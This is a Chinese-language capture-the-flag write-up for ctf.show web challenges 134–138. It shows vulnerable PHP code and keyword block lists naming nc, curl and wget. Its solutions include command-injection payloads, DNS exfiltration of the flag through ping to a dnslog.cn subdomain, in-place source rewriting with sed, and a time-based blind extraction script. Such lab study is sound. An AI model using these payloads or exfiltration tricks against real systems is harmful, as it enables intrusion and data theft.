web134
<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
die(file_get_contents('flag.php'));
}
官方对于web135
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
eval(substr($F,0,6));
}else{
die("师傅们居然破解了前面的,那就来一个加强版吧");
}
}
方法一
flag复制1.txt
/?F=`$F`; cp flag.php 1.txt
再访问1.txt
方法二
在限制为6个字符
我们可以传入?F=`$F`;+ping `nl flag.php|awk 'NR==15'|tr -cd "[a-z]"/"[0-9]"/"{"/"-"/"}"`.yz3qdx.dnslog.cn
在http://dnslog.cn/网站进行回显
web136
<?php
error_reporting(0);
function check($x){
if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
die('too young too simple sometimes naive!');
}
}
if(isset($_GET['c'])){
$c=$_GET['c'];
check($c);
exec($c);
}
else{
highlight_file(__FILE__);
}
?>
exec此程序必须将输出重定向到文件或其它输出流。否则会导致 PHP 挂起,直至程序执行结束
就是不会回显,看到执行的结果是本题的一个重点
我们可以将输出重定向的一个文件使用tee
例如: ls | tee 1.txt 将输出重定向到1.txt
方法一
?c=ls | tee 1
?c=cat /f149_15_h3r3 | tee 2
方法二
通过xargs sed批量修改原文件,将文件中的die换成echo exec换成system
答案
?c=ls | xargs sed -i 's/exec/system/'
?c=ls | xargs sed -i 's/die/echo/'
之后随便玩
方法三
原理:
[root@localhost ~]# if [ `ls / -1 | cut -c 1 |awk "NR==1"` == "b" ]; then sleep 3; fi
(3秒后...)
[root@localhost ~]#
通过这个原理进行注入
脚本:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t
from urllib.parse import quote as urlen
url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c='
alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
for i in range(1,100):
for char in alphabet:
# payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char) #flag.php
payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
# data = {'cmd':payload}
try:
start = int(t.time())
r = requests.get(url+payload)
# r = requests.post(url, data=data)
end = int(t.time()) - start
# print(i,char)
if end >= 3:
result += char
print("Flag: "+result)
break
except Exception as e:
print(e)
web137 138
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
function __wakeup(){
die("private class");
}
static function getFlag(){
echo file_get_contents("flag.php");
}
}
if(strripos($_POST['ctfshow'], ":")>-1){
die("private function");
}
call_user_func($_POST['ctfshow']);
/*<?php
$rest = strripos("aaaeefwea","fw");
echo $rest;
5*/
在POST传入:后会被die结束,因此不能有:,这一题主要考察数组同样可以调用类
在题目修改后实际传入的数组在下面,查看源码即可以拿到flag
<?php
class Foo {
function __wakeup(){
die("private class");
}
static public function test() {
print "Hello world!\n";
}
}
call_user_func('Foo::test'); // As of PHP 5.3.0
call_user_func(array('Foo', 'test')); // As of PHP 5.3.0
?>
Hello world!
Hello world!
[Finished in 139ms]
如果直接写ctfshow=array('ctfshow','getFlag')
就会得到这个
string(26) "array('ctfshow','getFlag')"
